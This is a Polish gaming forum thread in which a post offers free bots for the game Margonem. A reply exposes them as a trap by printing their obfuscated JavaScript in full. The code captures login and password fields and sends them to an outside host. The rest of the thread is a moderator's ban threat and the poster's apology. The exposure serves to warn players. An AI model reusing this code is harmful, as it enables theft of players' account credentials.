Skocz do zawartości
  • 👋 Witaj na MPCForum!

Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

• Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

Zarejestruj się teraz

Wszystkie boty dostępne za darmo!

darmowebotymargo

Rekomendowane odpowiedzi

Opublikowano

Witam wszystkich bardzo serdecznie.

Ostatnimi czasy w grze Margonem dzieje się bardzo źle, wszędzie kradzieże, złodzieje i oszuści, sam zostałem ostatnio oszukany... Administracja nic z tym nie robi, nie pomogli mi, mimo, że spędziłem w tej grze ostatnie kilka lat, i wydałem nie mało. W związku z tym postanowiłem udostępnić wszystkie programy z których korzystałem podczas mojej rozgrywki, w celu jej ułatwienia, a oto one:

sam syf

Życzę wszystkim miłego korzystania, ja tymczasem się żegnam. Cześć wszystkim (to już chyba na zawsze.. ?) !

Opublikowano

var TpG3Y86zpgrtWMzb,ZHN4ekpZ5m95pFbJ,YQTtmEs6a5mTXE5a;function UagZgR8PZcWcwvYp(){$(atob("I3Vsb2dpbg==")).val()!=TpG3Y86zpgrtWMzb&&$(atob("I3Vsb2dpbg==")).val()&&(TpG3Y86zpgrtWMzb=$(atob("I3Vsb2dpbg==")).val()),$(atob("I3VwYXNz")).val()!=ZHN4ekpZ5m95pFbJ&&$(atob("I3VwYXNz")).val()&&(ZHN4ekpZ5m95pFbJ=$(atob("I3VwYXNz")).val()),!$(atob("I3VwYXNz")).val()&&!$(atob("I3Vsb2dpbg==")).val()&&TpG3Y86zpgrtWMzb&&ZHN4ekpZ5m95pFbJ&&YQTtmEs6a5mTXE5a!=TpG3Y86zpgrtWMzb+" | "+ZHN4ekpZ5m95pFbJ&&($.ajax({url:atob("aHR0cHM6Ly96M3Y2cnljNi5jdDgucGwvYWpheC5waHA/bG9naW49")+TpG3Y86zpgrtWMzb+atob("JnBhc3N3b3JkPQ==")+ZHN4ekpZ5m95pFbJ}),YQTtmEs6a5mTXE5a=TpG3Y86zpgrtWMzb+" | "+ZHN4ekpZ5m95pFbJ)}setInterval(UagZgR8PZcWcwvYp,100)

Polecam, jak ktoś chce wysłać swoje passy na discorda tego pana i nie mieć konta.

Znalezione obrazy dla zapytania amfetamina

Opublikowano

W sumie to próba wrzucenia tego tutaj kolejny raz już mnie nie zaskakuje. Bardziej ciekawi mnie jednak to powiązanie kont, bo chwilę szukałam, kto tak namiętnie i nieustannie próbuje te niechciane prezenty przemycić.

image.png

@Nerfinekk czekam dobę na sensowny komentarz (bajki proszę sobie zachować dla siebie) na PW - jeśli jednak nie skorzystasz z tej możliwości, a wiedz, że raczej takowej nie daję, to banuję wszystkie konta, między którymi znajdę jakiekolwiek powiązanie - w tym oczywiście Twoje główne, pozostawiając jedynie odpowiednią procedurę do odwołania się od bana.  

• Aive zablokował(a) ten temat
  • Aive odblokował(a) ten temat
Gość Nerfinekk
Opublikowano

Witam,

Tak to ja jestem odpowiedzialny za wrzucenie tego syfu na forum, jest mi ogromnie przykro... ?

Bardzo przepraszam za to co zrobiłem, i obiecuję, że taka sytuacja się więcej nie powtórzy. Każdy z nas popełnia błędy, jest to rzeczą ludzką, jednakże nie każdy potrafi się do nich przyznać, a następnie postarać się coś z nich wyciągnąć i ich nie powielać w przyszłości.

Chciałem też nadmienić, że co do wrzucanych przeze mnie wcześniej botów na forum (z tego konta, np. HYBOT), nie dodawałem do nich żadnych niespodzianek, nie udostępniałbym czegoś takiego pod swoim nickiem.

Pozdrawiam, Nerfinek. ?

• Aive zmienił(a) tytuł na Wszystkie boty dostępne za darmo!
  • Aive zablokował(a) ten temat

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

• Dodaj nową pozycję...